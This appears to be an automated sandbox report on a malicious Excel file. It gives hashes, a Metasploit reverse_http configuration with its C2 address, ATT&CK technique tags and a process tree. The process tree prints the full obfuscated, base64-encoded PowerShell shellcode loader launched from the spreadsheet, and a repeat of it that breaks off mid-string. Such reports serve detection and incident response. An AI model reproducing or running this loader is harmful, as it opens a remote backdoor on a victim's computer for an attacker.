metasploit | 20a1a86fd4454d5b76d5b6e5433e792bb703ba5ca7c72e150d6e59db82761484

General

Target

20a1a86fd4454d5b76d5b6e5433e792bb703ba5ca7c72e150d6e59db82761484.xls
Size

44KB
MD5

a3fd69807a69f1b3547ae1333074818f
SHA1

b302683418ffe720430ca1107f53cb3bd0d273ed
SHA256

20a1a86fd4454d5b76d5b6e5433e792bb703ba5ca7c72e150d6e59db82761484
SHA512

04831d55dc7affab74f8b3bb8198aca3ad53fd39171f322394c8f414b2c6180c8d89efa4e053803471ebd5ba690d5ee966ad48d7c8e1d79b8f32050064c4fa48
SSDEEP

768:8P1k3hbdlylKsgqopeJBWhZFGkE+cL2NdAJYstYa6PiRDkp3ZiAk4cD3tT:o1k3hbdlylKsgqopeJBWhZFGkE+cL2Nc

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://192.168.1.1:999/UBACbxCvMQYL6ArpVZYZpgR-yH-56

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2848	1580	powershell.exe	29

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2664	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1580	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2848	powershell.exe
2952	powershell.exe
2664	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	2664	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1580	EXCEL.EXE
1580	EXCEL.EXE
1580	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1580 wrote to memory of 2848	1580	EXCEL.EXE	30
PID 1580 wrote to memory of 2848	1580	EXCEL.EXE	30
PID 1580 wrote to memory of 2848	1580	EXCEL.EXE	30
PID 1580 wrote to memory of 2848	1580	EXCEL.EXE	30
PID 2848 wrote to memory of 2952	2848	powershell.exe	32
PID 2848 wrote to memory of 2952	2848	powershell.exe	32
PID 2848 wrote to memory of 2952	2848	powershell.exe	32
PID 2848 wrote to memory of 2952	2848	powershell.exe	32
PID 2952 wrote to memory of 2664	2952	powershell.exe	33
PID 2952 wrote to memory of 2664	2952	powershell.exe	33
PID 2952 wrote to memory of 2664	2952	powershell.exe	33
PID 2952 wrote to memory of 2664	2952	powershell.exe	33
PID 2664 wrote to memory of 1144	2664	powershell.exe	34
PID 2664 wrote to memory of 1144	2664	powershell.exe	34
PID 2664 wrote to memory of 1144	2664	powershell.exe	34
PID 2664 wrote to memory of 1144	2664	powershell.exe	34
PID 1144 wrote to memory of 2808	1144	csc.exe	35
PID 1144 wrote to memory of 2808	1144	csc.exe	35
PID 1144 wrote to memory of 2808	1144	csc.exe	35
PID 1144 wrote to memory of 2808	1144	csc.exe	35

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\20a1a86fd4454d5b76d5b6e5433e792bb703ba5ca7c72e150d6e59db82761484.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1580
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /w 1 /C "sv sCo -;sv VW ec;sv JlA ((gv sCo).value.toString()+(gv VW).value.toString());powershell (gv JlA).value.toString() ('JABGAEoAPQAnACQASABKAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgAiACsAIgBkACIAKwAiAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKwAiAC4AIgArACIAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACsAIgAuACIAKwAiAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABIAFUAbwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgAiACsAIgBkACIAKwAiAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAbQBwAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQA2AGUALAB9ADYANQAsAH0ANwA0ACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA2ADkALAB9ADYAZQAsAH0ANgA5ACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQBmAGYALAB9AGQANQAsAH0AMwAxACwAfQBkAGIALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA2ADgALAB9ADMAYQAsAH0ANQA2ACwAfQA3ADkALAB9AGEANwAsAH0AZgBmACwAfQBkADUALAB9ADUAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMwAsAH0ANQAzACwAfQA1ADMALAB9ADYAOAAsAH0AZQA3ACwAfQAwADMALAB9ADAAMAAsAH0AMAAwACwAfQBlADgALAB9AGIAMAAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0AMgBmACwAfQA1ADUALAB9ADQAMgAsAH0ANAAxACwAfQA0ADMALAB9ADYAMgAsAH0ANwA4ACwAfQA0ADMALAB9ADcANgAsAH0ANABkACwAfQA1ADEALAB9ADUAOQAsAH0ANABjACwAfQAzADYALAB9ADQAMQAsAH0ANwAyACwAfQA3ADAALAB9ADUANgAsAH0ANQBhACwAfQA1ADkALAB9ADUAYQAsAH0ANwAwACwAfQA2ADcALAB9ADUAMgAsAH0AMgBkACwAfQA3ADkALAB9ADQAOAAsAH0AMgBkACwAfQAzADUALAB9ADMANgAsAH0AMAAwACwAfQA1ADAALAB9ADYAOAAsAH0ANQA3ACwAfQA4ADkALAB9ADkAZgAsAH0AYwA2ACwAfQBmAGYALAB9AGQANQAsAH0AOAA5ACwAfQBjADYALAB9ADUAMwAsAH0ANgA4ACwAfQAwADAALAB9ADMAMgAsAH0AZQA4ACwAfQA4ADQALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANwAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AZQBiACwAfQA1ADUALAB9ADIAZQAsAH0AMwBiACwAfQBmAGYALAB9AGQANQAsAH0AOQA2ACwAfQA2AGEALAB9ADAAYQAsAH0ANQBmACwAfQA2ADgALAB9ADgAMAAsAH0AMwAzACwAfQAwADAALAB9ADAAMAAsAH0AOAA5ACwAfQBlADAALAB9ADYAYQAsAH0AMAA0ACwAfQA1ADAALAB9ADYAYQAsAH0AMQBmACwAfQA1ADYALAB9ADYAOAAsAH0ANwA1ACwAfQA0ADYALAB9ADkAZQAsAH0AOAA2ACwAfQBmAGYALAB9AGQANQAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AMgBkACwAfQAwADYALAB9ADEAOAAsAH0ANwBiACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANQAsAH0AMQA2ACwAfQA2ADgALAB9ADgAOAAsAH0AMQAzACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA0ADQALAB9AGYAMAAsAH0AMwA1ACwAfQBlADAALAB9AGYAZgAsAH0AZAA1ACwAfQA0AGYALAB9ADcANQAsAH0AYwBkACwAfQA2ADgALAB9AGYAMAAsAH0AYgA1ACwAfQBhADIALAB9ADUANgAsAH0AZgBmACwAfQBkADUALAB9ADYAYQAsAH0ANAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMQAwACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQAwADAALAB9ADAAMAAsAH0AN'+'AAwACwAfQAwADAALAB9ADUAMwAsAH0ANgA4ACwAfQA1ADgALAB9AGEANAAsAH0ANQAzACwAfQBlADUALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADMALAB9ADUAMwAsAH0ANQAzACwAfQA4ADkALAB9AGUANwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMAAsAH0AMgAwACwAfQAwADAALAB9ADAAMAAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AMQAyACwAfQA5ADYALAB9ADgAOQAsAH0AZQAyACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AYwBkACwAfQA4AGIALAB9ADAANwAsAH0AMAAxACwAfQBjADMALAB9ADgANQAsAH0AYwAwACwAfQA3ADUALAB9AGUANQAsAH0ANQA4ACwAfQBjADMALAB9ADUAZgAsAH0AZQA4ACwAfQA2ADkALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADMAMQAsAH0AMwA5ACwAfQAzADIALAB9ADIAZQAsAH0AMwAxACwAfQAzADYALAB9ADMAOAAsAH0AMgBlACwAfQAzADEALAB9ADIAZQAsAH0AMwAxACwAfQAwADAAIgA7ACQARQBFAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABIAEoAIAAtAE4AYQBtAGUAIAAiAGsARgAiACAALQBuAGEAbQBlAHMAIABqAHcAcQA7ACQARQBFAD0AJABFAEUALgByAGUAcABsAGEAYwBlACgAIgBqAHcAcQAiACwAIAAiAFcAaQBuADMAMgBGAHUAbgAiACsAIgBjACIAKwAiAHQAaQBvAG4AcwAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJABtAHAAIAA9ACAAJABtAHAALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAFcARgBmAGQAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgBXAEYAZgBkACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABuAEsAPQAwAHgAMQAwADAANAA7AGkAZgAgACgAJABtAHAALgBMACAALQBnAHQAIAAwAHgAMQAwADAANAApAHsAJABuAEsAPQAkAG0AcAAuAEwAfQA7ACQAbgBPAD0AJABFAEUAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADQALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAEgAVQBvACAAPQAgADAAOwBmAG8AcgAoACQAYQByAD0AMAA7ACQAYQByACAALQBsAGUAKAAkAG0AcAAuAEwAZQBuAGcAdABoAC0AMQApADsAJABhAHIAKwArACkAewAkAEUARQA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAG4ATwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABhAHIAKQAsACAAJABtAHAAWwAkAGEAcgBdACwAIAAxACkAfQA7ACQARQBFADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAG4ATwAsACAAMAB4ADEAMAAwADQALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAEgAVQBvACkAOwAkAEUARQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAB4ADAAMAAsACQAbgBPACwAMAAsADAALAAwACkAOwAnADsAJABkAGEAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEYASgApACkAOwAkAEgAWgA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABXAGoAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAUABjAGUAbAAgAD0AIAAiAEMAOgBcACQAVwBqAFwAYgBIAHgASQBzAEEAXAAkAFcAagAkAEgAWgBcAHYAMQAuADAAXAAkAEgAWgAiADsAJABQAGMAZQBsACAAPQAgACQAUABjAGUAbAAuAHIAZQBwAGwAYQBjAGUAKAAiAGIASAB4ACIALAAgACIAcwB5AHMAIgApADsAJABQAGMAZQBsACAAPQAgACQAUABjAGUAbAAuAHIAZQBwAGwAYQBjAGUAKAAiAEkAcwBBACIALAAgACIAdwBvAHcANgA0ACIAKQA7ACQATQBRAFAAIAA9ACAAJwBUAHIAdQAiACsAIgBlACIAKwAiACcAOwBpAGYAKABbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBJAHMANgA0AEIAaQB0AE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACAALQBlAHEAIAAnACQATQBRAFAAJwApAHsAJABIAFoAPQAgACQAUABjAGUAbAB9ADsAJABpAHYAPQAiACAAJABIAFoAIABiAEoAdABmACAAJABkAGEAIgA7ACQAaQB2AD0AJABpAHYALgByAGUAcABsAGEAYwBlACgAIgBiAEoAdABmACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAaQB2AA'+'==')"
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2848
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAEoAPQAnACQASABKAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgAiACsAIgBkACIAKwAiAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKwAiAC4AIgArACIAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACsAIgAuACIAKwAiAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABIAFUAbwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgAiACsAIgBkACIAKwAiAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAbQBwAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQA2AGUALAB9ADYANQAsAH0ANwA0ACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA2ADkALAB9ADYAZQAsAH0ANgA5ACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQBmAGYALAB9AGQANQAsAH0AMwAxACwAfQBkAGIALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA2ADgALAB9ADMAYQAsAH0ANQA2ACwAfQA3ADkALAB9AGEANwAsAH0AZgBmACwAfQBkADUALAB9ADUAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMwAsAH0ANQAzACwAfQA1ADMALAB9ADYAOAAsAH0AZQA3ACwAfQAwADMALAB9ADAAMAAsAH0AMAAwACwAfQBlADgALAB9AGIAMAAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0AMgBmACwAfQA1ADUALAB9ADQAMgAsAH0ANAAxACwAfQA0ADMALAB9ADYAMgAsAH0ANwA4ACwAfQA0ADMALAB9ADcANgAsAH0ANABkACwAfQA1ADEALAB9ADUAOQAsAH0ANABjACwAfQAzADYALAB9ADQAMQAsAH0ANwAyACwAfQA3ADAALAB9ADUANgAsAH0ANQBhACwAfQA1ADkALAB9ADUAYQAsAH0ANwAwACwAfQA2ADcALAB9ADUAMgAsAH0AMgBkACwAfQA3ADkALAB9ADQAOAAsAH0AMgBkACwAfQAzADUALAB9ADMANgAsAH0AMAAwACwAfQA1ADAALAB9ADYAOAAsAH0ANQA3ACwAfQA4ADkALAB9ADkAZgAsAH0AYwA2ACwAfQBmAGYALAB9AGQANQAsAH0AOAA5ACwAfQBjADYALAB9ADUAMwAsAH0ANgA4ACwAfQAwADAALAB9ADMAMgAsAH0AZQA4ACwAfQA4ADQALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANwAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AZQBiACwAfQA1ADUALAB9ADIAZQAsAH0AMwBiACwAfQBmAGYALAB9AGQANQAsAH0AOQA2ACwAfQA2AGEALAB9ADAAYQAsAH0ANQBmACwAfQA2ADgALAB9ADgAMAAsAH0AMwAzACwAfQAwADAALAB9ADAAMAAsAH0AOAA5ACwAfQBlADAALAB9ADYAYQAsAH0AMAA0ACwAfQA1ADAALAB9ADYAYQAsAH0AMQBmACwAfQA1ADYALAB9ADYAOAAsAH0ANwA1ACwAfQA0ADYALAB9ADkAZQAsAH0AOAA2ACwAfQBmAGYALAB9AGQANQAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AMgBkACwAfQAwADYALAB9ADEAOAAsAH0ANwBiACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANQAsAH0AMQA2ACwAfQA2ADgALAB9ADgAOAAsAH0AMQAzACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA0ADQALAB9AGYAMAAsAH0AMwA1ACwAfQBlADAALAB9AGYAZgAsAH0AZAA1ACwAfQA0AGYALAB9ADcANQAsAH0AYwBkACwAfQA2ADgALAB9AGYAMAAsAH0AYgA1ACwAfQBhADIALAB9ADUANgAsAH0AZgBmACwAfQBkADUALAB9ADYAYQAsAH0ANAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMQAwACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQAwADAALAB9ADAAMAAsAH0ANAAwACwAfQAwADAALAB9ADUAMwAsAH0ANgA4ACwAfQA1ADgALAB9AGEANAAsAH0ANQAzACwAfQBlADUALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADMALAB9ADUAMwAsAH0ANQAzACwAfQA4ADkALAB9AGUANwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMAAsAH0AMgAwACwAfQAwADAALAB9ADAAMAAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AMQAyACwAfQA5ADYALAB9ADgAOQAsAH0AZQAyACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AYwBkACwAfQA4AGIALAB9ADAANwAsAH0AMAAxACwAfQBjADMALAB9ADgANQAsAH0AYwAwACwAfQA3ADUALAB9AGUANQAsAH0ANQA4ACwAfQBjADMALAB9ADUAZgAsAH0AZQA4ACwAfQA2ADkALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADMAMQAsAH0AMwA5ACwAfQAzADIALAB9ADIAZQAsAH0AMwAxACwAfQAzADYALAB9ADMAOAAsAH0AMgBlACwAfQAzADEALAB9ADIAZQAsAH0AMwAxACwAfQAwADAAIgA7ACQARQBFAD0AQQBkAGQALQBU